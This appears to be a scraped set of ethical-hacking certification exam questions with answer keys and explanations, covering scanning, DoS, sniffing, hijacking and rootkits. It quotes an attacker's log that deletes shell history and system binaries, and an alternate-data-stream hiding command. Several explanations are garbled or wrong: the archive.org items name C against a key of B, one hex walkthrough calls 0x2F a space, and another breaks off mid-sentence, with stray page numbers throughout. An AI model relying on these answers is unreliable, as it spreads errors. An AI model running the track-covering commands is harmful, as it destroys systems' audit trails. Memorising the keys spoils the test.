579 Justine is the systems administrator for her company, an international shipping company with offices all over the world. Recent US regulations have forced the company to implement stronger and more secure means of communication. Justine and other administrators have been put in charge of securing the company's digital communication lines. After implementing email encryption, Justine now needs to implement robust digital signatures to ensure data authenticity and reliability. Justine has decided to implement digital signatures which are a variant of DSA and that operate on elliptical curve groups. These signatures are more efficient than DSA and are not vulnerable to a number field sieve attacks. What type of signature has Justine decided to implement? A. She has decided to implement ElGamal signatures since they offer more reliability than the typical DSA signatures B. Justine has decided to use ECDSA signatures since they are more efficient than DSA signatures C. Justine is now utilizing SHA-1 with RSA signatures to help ensure data reliability D. These types of signatures that Justine has decided to use are called RSA-PSS signatures

B (Explanation: The Elliptic Curve Digital Signature Algorithm (ECDSA) is a variant of the Digital Signature Algorithm (DSA) which uses Elliptic curve cryptography. http://en.wikipedia.org/wiki/Elliptic_Curve_DSA 350)

584 James is an IT security consultant as well as a certified ethical hacker. James has been asked to audit the network security of Yerta Manufacturing, a tool manufacturing company in Phoenix. James performs some initial external tests and then begins testing the security from inside the company's network. James finds some big problems right away; a number of users that are working on Windows XP computers have saved their usernames and passwords used to connect to servers on the network. This way, those users do not have to type in their credentials every time they want access to a server. James tells the IT manager of Yerta Manufacturing about this, and the manager does not believe this is possible on Windows XP. To prove his point, James has a user logon to a computer and then James types in a command that brings up a window that says "Stored User Names and Passwords". What command did James type in to get this window to come up? A. To bring up this stored user names and passwords window, James typed in "rundll32.exe storedpwd.dll, ShowWindow" B. James had to type in "rundll32.exe keymgr.dll, KRShowKeyMgr" to get the window to pop up C. James typed in the command "rundll32.exe storedpwd.dll" to get the Stored User Names and Passwords window to come up D. The command to bring up this window is "KRShowKeyMgr"

B (Explanation: The Stored User Names and Passwords applet lets you assign user names and passwords to use 353 when needing to authenticate yourself to services in domains other than the one you are currently logged into. The normal way of running this applet can be difficult to find quickly, so here is a way to launch it using a desktop shortcut using the rundll32.exe program: Click on START - RUN and type the following (follwed by ENTER): rundll32.exe keymgr.dll,KRShowKeyMgr http://www.tweakxp.com/article37352.aspx)

236 In Linux, the three most common commands that hackers usually attempt to Trojan are: A. car, xterm, grep B. netstat, ps, top C. vmware, sed, less D. xterm, ps, nc

B (Explanation: The easiest programs to trojan and the smartest ones to trojan are ones commonly run by administrators and users, in this case netstat, ps, and top, for a complete list of commonly trojaned and rootkited software please reference this URL: http://www.usenix.org/publications/login/1999- 9/features/rootkits.html)

102 Which Type of scan sends a packets with no flags set ? Select the Answer A. Open Scan B. Null Scan C. Xmas Scan D. Half-Open Scan

B (Explanation: The types of port connections supported are:)

585 Bob was frustrated with his competitor, Brownies Inc., and decided to launch an attack that would result in serious financial losses. He planned the attack carefully and carried out the attack at the appropriate moment. Meanwhile, Trent, an administrator at Brownies Inc., realized that their main financial transaction server had been attacked. As a result of the attack, the server crashed and Trent needed to reboot the system, as no one was able to access the resources of the company. This process involves human interaction to fix it. What kind of Denial of Service attack was best illustrated in the scenario above? A. DOS attacks which involves flooding a network or system B. DOS attacks which involves crashing a network or system C. DOS attacks which is done accidentally or deliberately D. Simple DDOS attack

B (Explanation: This is not a DDOS, there is only one person involved as attacker)

15 Which one of the following is defined as the process of distributing incorrect Internet Protocol (IP) addresses/names with the intent of diverting traffic? A. Network aliasing B. Domain Name Server (DNS) poisoning C. Reverse Address Resolution Protocol (ARP) D. Port scanning

B (Explanation: This reference is close to the one listed DNS poisoning is the correct answer. This is how DNS DOS attack can occur. If the actual DNS records are unattainable to the attacker for him to alter in this fashion, which they should be, the attacker can insert this data into the cache of there server instead of replacing the actual records, which is referred to as cache 9 - - poisoning.)

342 000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E. 010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 [email protected]...... 020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u......}.P. 030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2 040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0. 050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C 060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep- 070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L 080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co 090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text 0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:. 0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft 0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25. 0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5 0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra 0F0 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 4C 61 73 nges:.bytes..Las 100 74 2D 4D 6F 64 69 66 69 65 64 3A 20 4D 6F 6E 2C t-Modified:.Mon, 204 110 20 31 39 20 4A 75 6C 20 31 39 39 39 20 30 37 3A .19.Jul.1999.07: 120 33 39 3A 32 36 20 47 4D 54 0D 0A 45 54 61 67 3A 39:26.GMT..ETag: 130 20 22 30 38 62 37 38 64 33 62 39 64 31 62 65 31 ."08b78d3b9d1be1 140 3A 61 34 61 22 0D 0A 0D 0A 3C 74 69 74 6C 65 3E :a4a"....<title> 150 53 6E 69 66 66 69 6E 67 20 28 6E 65 74 77 6F 72 Sniffing.(networ 160 6B 20 77 69 72 65 74 61 70 2C 20 73 6E 69 66 66 k.wiretap,.sniff 170 65 72 29 20 46 41 51 3C 2F 74 69 74 6C 65 3E 0D er).FAQ</title>. 180 0A 0D 0A 3C 68 31 3E 53 6E 69 66 66 69 6E 67 20 ...<h1>Sniffing. 190 28 6E 65 74 77 6F 72 6B 20 77 69 72 65 74 61 70 (network.wiretap 1A0 2C 20 73 6E 69 66 66 65 72 29 20 46 41 51 3C 2F ,.sniffer).FAQ</ 1B0 68 31 3E 0D 0A 0D 0A 54 68 69 73 20 64 6F 63 75 h1>....This.docu 1C0 6D 65 6E 74 20 61 6E 73 77 65 72 73 20 71 75 65 ment.answers.que 1D0 73 74 69 6F 6E 73 20 61 62 6F 75 74 20 74 61 70 stions.about.tap 1E0 70 69 6E 67 20 69 6E 74 6F 20 0D 0A 63 6F 6D 70 ping.into...comp 1F0 75 74 65 72 20 6E 65 74 77 6F 72 6B 73 20 61 6E uter.networks.an This packet was taken from a packet sniffer that monitors a Web server. This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header ending in two line-feeds (0D 0A 0D 0A) and then the data. By examining the packet identify the name and version of the Web server? A. Apache 1.2 B. IIS 4.0 C. IIS 5.0 D. Linux WServer 2.3

B (Explanation: We see that the server is Microsoft, but the exam designer didn't want to make it easy for you. So what they did is blank out the IIS 4.0. The key is in line "0B0" as you see: 205 0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft 49 is I, so we get II 53 is S, so we get IIS 2F is a space 34 is 4 2E is . 30 is 0 So we get IIS 4.0 The answer is B If you don't remember the ASCII hex to Character, there are enough characters and numbers already converted. For example, line "050" has STRIDER which is 53 54 52 49 44 45 52 and gives you the conversion for the "I:" and "S" characters (which is "49" and "53").)

341 You work as security technician at ABC.com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation? A. Use mget to download all pages locally for further inspection. B. Use wget to download all pages locally for further inspection. C. Use get* to download all pages locally for further inspection. D. Use get() to download all pages locally for further inspection.

B (Explanation: Wget is a utility used for mirroring websites, get* doesn't work, as for the actual FTP command to 203 work there needs to be a space between get and * (ie. get *), get(); is just bogus, that's a C function that's written 100% wrong. mget is a command used from "within" ftp itself, ruling out A. Which leaves B use wget, which is designed for mirroring and download files, especially web pages, if used with the -R option (ie. wget -R www.ABC.com) it could mirror a site, all expect protected portions of course. Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP and can be used to make mirrors of archives and home pages thus enabling work in the background, after having logged off.)

51 What port scanning method involves sending spoofed packets to a target system and then looking for adjustments to the IPID on a zombie system? A. Blind Port Scanning B. Idle Scanning C. Bounce Scanning D. Stealth Scanning E. UDP Scanning

B (Explanation: from NMAP:-sI <zombie host[:probeport]> Idlescan: This advanced scan method allows fora truly blind TCP port scan of the target (meaning no packets are sent tothe tar- get from your real IP address). Instead, a unique side-channelattack exploits predictable "IP fragmentation ID" sequence generation onthe zombie host to glean information about the open ports on the target. 32)

340 You visit a website to retrieve the listing of a company's staff members. But you can not find it on the website. You know the listing was certainly present one year before. How can you retrieve information from the outdated website? A. Through Google searching cached files B. Through Archive.org C. Download the website and crawl it D. Visit customers' and prtners' websites

B (Explanation: (Explanation: Archive.org mirrors websites and categorizes them by date and month depending on the crawl time. Archive.org dates back to 1996, Google is incorrect because the cache is only as recent as the latest crawl, the cache is over-written on each subsequent crawl. Download the website is incorrect because that's the same as what you see online. Visiting customer partners websites is just bogus. The answer is then Firmly, C, archive.org)

184 What is the algorithm used by LM for Windows2000 SAM ? A. MD4 B. DES C. SHA D. SSL

B (Explanation: (Explanation: Okay, this is a tricky question. We say B, DES, but it could be A "MD4" depending on what their asking - Windows 2000/XP keeps users passwords not "apparently", but as hashes, i.e. actually as "check sum" of the passwords. Let's go into the passwords keeping at large. The most interesting structure of the complex SAM-file building is so called V-block. It's size is 32 bytes and it includes hashes of the password for the local entering: NT Hash of 16-byte length, and hash used during the authentication of access to the common resources of other computers LanMan Hash, or simply LM Hash, of the same 16-byte length. Algorithms of the formation of these hashes are following: NT Hash formation: LM Hash formation:)

276 Which one of the following instigates a SYN flood attack? 166 A. Generating excessive broadcast packets. B. Creating a high number of half-open connections. C. Inserting repetitive Internet Relay Chat (IRC) messages. D. A large number of Internet Control Message Protocol (ICMP) traces.

B (Explanation: A SYN attack occurs when an attacker exploits the use of the buffer space during a Transmission Control Protocol (TCP) session initialization handshake. The attacker floods the target system's small "in-process" queue with connection requests, but it does not respond when a target system replies to those requests. This causes the target system to time out while waiting for the proper response, which makes the system crash or become unusable.)

52 What port scanning method is the most reliable but also the most detectable? A. Null Scanning B. Connect Scanning C. ICMP Scanning D. Idlescan Scanning E. Half Scanning F. Verbose Scanning

B (Explanation: A TCP Connect scan, named after the Unix connect() system call is the most accurate scanning method. If a port is open the operating system completes the TCP three-way handshake, and the port scanner immediately closes the connection.)

155 Which definition among those given below best describes a covert channel? A. A server program using a port that is not well known. B. Making use of a protocol in a way it is not intended to be used. C. It is the multiplexing taking place on a communication link. D. It is one of the weak channels used by WEP which makes it insecure.

B (Explanation: A covert channel is described as: "any communication channel that can be exploited by a process to transfer information in a manner that violates the systems security policy." Essentially, it is a method of communication that is not part of an actual computer system design, but can be used to transfer information to users or system processes that normally would not be allowed access to the information.)

353 Bill successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn in interactive shell and plans to deface the main web page. He fist attempts to use the "Echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tires to overwrite it with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem? 211 A. The system is a honeypot B. The HTML file has permissions of read only C. You can't use a buffer overflow to deface a web page D. There is a problem with the shell and he needs to run the attack again

B (Explanation: A honeypot has no interest in stopping an intruder from altering the "target" files. A buffer overflow is a way to gain access to the target computer. Once he has spawned a shell it is unlikely that it will not work as intended, but the user context that the shell is spawned in might stop him from altering the index.html file incase he doesn't have sufficient rights.)

157 Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between the two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric is relaying the information between the two. What would you call this attack? A. Interceptor B. Man-in-the-middle C. ARP Proxy D. Poisoning Attack

B (Explanation: A man-in-the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised.)

477 When referring to the Domain Name Service, what is denoted by a 'zone'? A. It is the first domain that belongs to a company. B. It is a collection of resource records. C. It is the first resource record type in the SOA. D. It is a collection of domains.

B (Explanation: A reasonable definition of a zone would be a portion of the DNS namespace where responsibility has been delegated.)

413 Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called? A. Spoof attack B. Replay attack C. Injection attack D. Rebound attack

B (Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet substitution (such as stream cipher attack).)

421 Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called? A. Spoof Attack B. Replay Attack C. Inject Attack D. Rebound Attack

B (Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it.)

323 John is using tokens for the purpose of strong authentication. He is not confident that his security is considerably strong. In the context of Session hijacking why would you consider this as a false sense of security? A. The token based security cannot be easily defeated. B. The connection can be taken over after authentication. C. A token is not considered strong authentication. D. Token security is not widely used in the industry.

B (Explanation: A token will give you a more secure authentication, but the tokens will not help against attacks that are directed against you after you have been authenticated.)

428 Which of the following is one of the key features found in a worm but not seen in a virus? A. The payload is very small, usually below 800 bytes. B. It is self replicating without need for user intervention. C. It does not have the ability to propagate on its own. D. All of them cannot be detected by virus scanners. 255

B (Explanation: A worm is similar to a virus by its design, and is considered to be a sub-class of a virus. Worms spread from computer to computer, but unlike a virus, it has the capability to travel without any help from a person. A worm takes advantage of file or information transport features on your system, which allows it to travel unaided.)

22 A very useful resource for passively gathering information about a target company is: A. Host scanning B. Whois search C. Traceroute D. Ping sweep

B (Explanation: A, C & D are "Active" scans, the question says: "Passively")

207 What file system vulnerability does the following command take advantage of? type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe A. HFS B. ADS C. NTFS D. Backdoor access

B (Explanation: ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to hide information in alternate data streams in existing files. The file can have multiple data streams and the data streams are accessed by filename:stream.)

399 In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He concludes that since his access points require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network. Unfortunately unauthorized users are still able to connect to the wireless network. Why do you think this is possible? 240 A. Bob forgot to turn off DHCP. B. All access points are shipped with a default SSID. C. The SSID is still sent inside both client and AP packets. D. Bob's solution only works in ad-hoc mode.

B (Explanation: All access points are shipped with a default SSID unique to that manufacturer, for example 3com uses the default ssid comcomcom.)

365 Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email [email protected]'. The application displays server error. What is wrong with the web application? A. The email is not valid B. User input is not sanitized C. The web server may be down D. The ISP connection is not reliable

B (Explanation: All input from web browsers, such as user data from HTML forms and cookies, must be stripped of special characters and HTML tags as described in the following CERT advisories: http://www.cert.org/advisories/CA-1997-25.html http://www.cert.org/advisories/CA-2000-02.html)

321 What is the most common vehicle for social engineering attacks? A. Email B. Direct in person C. Local Area Networks D. Peer to Peer Networks

B (Explanation: All social engineering techniques are based on flaws in human logic known as cognitive biases. Topic 10, Session Hijacking)

16 You are footprinting an organization to gather competitive intelligence. You visit the company's website for contact information and telephone numbers but do not find it listed there. You know that they had the entire staff directory listed on their website 12 months ago but not it is not there. How would it be possible for you to retrieve information from the website that is outdated? A. Visit google's search engine and view the cached copy. B. Visit Archive.org web site to retrieve the Internet archive of the company's website. C. Crawl the entire website and store them into your computer. D. Visit the company's partners and customers website for this information.

B (Explanation: Archive.org mirrors websites and categorizes them by date and month depending on the crawl time. Archive.org dates back to 1996, Google is incorrect because the cache is only as recent as the latest crawl, the cache is over-written on each subsequent crawl. Download the website is incorrect because that's the same as what you see online. Visiting customer partners websites is just bogus. The answer is then Firmly, C, archive.org)

324 What is the key advantage of Session Hijacking? A. It can be easily done and does not require sophisticated skills. B. You can take advantage of an authenticated connection. C. You can successfully predict the sequence number generation. D. You cannot be traced in case the hijack is detected.

B (Explanation: As an attacker you don't have to steal an account and password in order to take 194 advantage of an authenticated connection.)

362 What does black box testing mean? A. You have full knowledge of the environment B. You have no knowledge of the environment C. You have partial knowledge of the environment

B (Explanation: Black box testing is conducted when you have no knowledge of the environment. It is more time consuming and expensive.)

398 In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications. Immediately after the implementation, users begin complaining about how slow the wireless network is. After benchmarking the network's speed. Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. Why does this happen in the VPN over wireless implementation? A. The stronger encryption used by the VPN slows down the network. B. Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications. C. VPNs use larger packets then wireless networks normally do. D. Using a VPN on wireless automatically enables WEP, which causes additional overhead.

B (Explanation: By applying VPN the access point will have to recalculate all headers destined for client and from clients twice.)

446 John is the network administrator of XSECURITY systems. His network was recently compromised. He analyzes the logfiles to investigate the attack. Take a look at the following Linux logfile snippet. The hacker compromised and "owned" a Linux machine. What is the hacker trying to accomplish here? [root@apollo /]# rm rootkit.c [root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm - rf /root/.bash_history ; rm - rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por359 ? 00:00:00 inetd 359 ? 00:00:00 inetd rm: cannot remove `/tmp/h': No such file or directory rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory [root@apollo /]# ps -aux | grep portmap [root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm - rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por359 ? 00:00:00 inetd rm: cannot remove `/sbin/portmap': No such file or directory rm: cannot remove `/tmp/h': No such file or directory >rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory [root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory A. The hacker is planting a rootkit B. The hacker is trying to cover his tracks C. The hacker is running a buffer overflow exploit to lock down the system D. The hacker is attempting to compromise more machines on the network 268

B (Explanation: By deleting temporary directories and emptying like bash_history that contains the last commands used with the bash shell he is trying to cover his tracks.)

359 Scanning for services is an easy job for Bob as there are so many tools available from the Internet. In order for him to check the vulnerability of company, he went through a few scanners that are currently available. Here are the scanners that he uses: Axent's NetRecon (http://www.axent.com) SARA, by Advanced Research Organization (http://www-arc.com/sara) VLAD the Scanner, by Razor (http://razor.bindview.com/tools/) However, there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob. What would be the best method to accurately identify the services running on a victim host? 214 A. Using Cheops-ng to identify the devices of company. B. Using the manual method of telnet to each of the open ports of company. C. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for company. D. Using the default port and OS to make a best guess of what services are running on each port for company.

B (Explanation: By running a telnet connection to the open ports you will receive banners that tells you what service is answering on that specific port.)

355 Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign display or modify ACLs (Access Control Lists) to files or folders and that could also be used within batch files. Which of the following tools could be used for this purpose? A. PERM.EXE B. CACLS.EXE C. CLACS.EXE D. NTPERM.EXE 212

B (Explanation: Cacls.exe (Change Access Control Lists) is an executable in Microsoft Windows to change Access Control List (ACL) permissions on a directory, its subcontents, or files. An access control list is a list of permissions for a file or directory that controls who can access it. Topic 12, Web Application Vulnerabilities)

335 Bart is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL's (access control lists) to files or folders and also one that can be used within batch files. Which of the following tools can be used for that purpose? (Choose the best answer) A. PERM.exe B. CACLS.exe C. CLACS.exe D. NTPERM.exe

B (Explanation: Cacls.exe is a Windows NT/2000/XP command-line tool you can use to assign, display, or modify ACLs (access control lists) to files or folders. Cacls is an interactive tool, and since it's a command-line utility, you can also use it in batch files. 200)

490 ETHER: Destination address : 0000BA5EBA11 ETHER: Source address : 00A0C9B05EBD ETHER: Frame Length : 1514 (0x05EA) ETHER: Ethernet Type : 0x0800 (IP) IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 1500 (0x5DC) IP: Identification = 7652 (0x1DE4) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. = Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 127 (0x7F) IP: Protocol = TCP - Transmission Control IP: Checksum = 0xC26D IP: Source Address = 10.0.0.2 IP: Destination Address = 10.0.1.201 TCP: Source Port = Hypertext Transfer Protocol TCP: Destination Port = 0x1A0B TCP: Sequence Number = 97517760 (0x5D000C0) TCP: Acknowledgement Number = 78544373 (0x4AE7DF5) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x10 : .A.... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....0... = No Push function TCP: 295 .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 28793 (0x7079) TCP: Checksum = 0x8F27 TCP: Urgent Pointer = 0 (0x0) An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application? A. Create a SYN flood B. Create a network tunnel C. Create multiple false positives D. Create a ping flood

B (Explanation: Certain types of encryption presents challenges to network-based intrusion detection and may leave the IDS blind to certain attacks, where a host-based IDS analyzes the data after it has been decrypted.)

343 This kind of attack will let you assume a users identity at a dynamically generated web page or site: A. SQL Injection B. Cross Site Scripting C. Session Hijacking D. Zone Transfer

B (Explanation: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. 206)

450 What is Cygwin? A. Cygwin is a free C++ compiler that runs on Windows 270 B. Cygwin is a free Unix subsystem that runs on top of Windows C. Cygwin is a free Windows subsystem that runs on top of Linux D. Cygwin is a X Windows GUI subsytem that runs on top of Linux GNOME environment

B (Explanation: Cygwin is a Linux-like environment for Windows. It consists of two parts: A DLL (cygwin1.dll) which acts as a Linux API emulation layer providing substantial Linux API functionality. A collection of tools which provide Linux look and feel. The Cygwin DLL works with all non-beta, non "release candidate", ix86 32 bit versions of Windows since Windows 95, with the exception of Windows CE.)

332 198 Sara is making use of Digest Authentication for her Web site. Why is this considered to be more secure than Basic authentication? A. Basic authentication is broken B. The password is never sent in clear text over the network C. The password sent in clear text over the network is never reused. D. It is based on Kerberos authentication protocol

B (Explanation: Digest access authentication is one of the agreed methods a web page can use to negotiate credentials with a web user (using the HTTP protocol). This method builds upon (and obsoletes) the basic authentication scheme, allowing user identity to be established without having to send a password in plaintext over the network.)

552 A digital signature is simply a message that is encrypted with the public key instead of the private key. A. True B. False

B (Explanation: Digital signatures enable the recipient of information to verify the authenticity of the information's origin, and also verify that the information is intact. Thus, public key digital signatures provide authentication and data integrity. A digital signature also provides non-repudiation, which means that it prevents the sender from claiming that he or she did not actually send the information. Instead of encrypting information using someone else's public key, you encrypt it with your private key. If the information can be decrypted with your public key, then it must have originated with you.)

563 Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster's office site in order to find relevant information. What would you call this kind of activity? A. Garbage Scooping B. Dumpster Diving C. Scanning D. CI Gathering

B (Explanation: Dumpster diving is the colloquial name for going through somebody's garbage -- which will usually be in dumpsters for large organizations. This is a powerful tactic because it is protected by social taboos. Trash is bad, and once it goes into the trash, something is best forgotten. The reality is that most company trash is fairly clean, and provides a gold mine of information.)

455 Peter is a Linux network admin. As a knowledgeable security consultant, he turns to you to look for help on a firewall. He wants to use Linux as his firewall and use the latest freely available version that is offered. What do you recommend? Select the best answer. A. Ipchains B. Iptables C. Checkpoint FW for Linux D. Ipfwadm 273

B (Explanation: Explanations: Ipchains was improved over ipfwadm with its chaining mechanism so that it can have multiple rulesets. However, it isn't the latest version of a free Linux firewall. Iptables replaced ipchains and is the latest of the free Linux firewall tools. Any Checkpoint firewall is not going to meet Jason's desire to have a free firewall. Ipfwadm is used to build Linux firewall rules prior to 2.2.0. It is a outdated version.)

111 Which FTP transfer mode is required for FTP bounce attack? A. Active Mode B. Passive Mode C. User Mode D. Anonymous Mode

B (Explanation: FTP bounce attack needs the server the support passive connections and the client program needs to use PORT command instead of the PASV command.)


संबंधित स्टडी सेट्स

Mastering: Reproduction and Development

View Set

week 11 chap 12 review questions

View Set

2.10: The Bool Data Type & 2.11 Determine the size of a Data type

View Set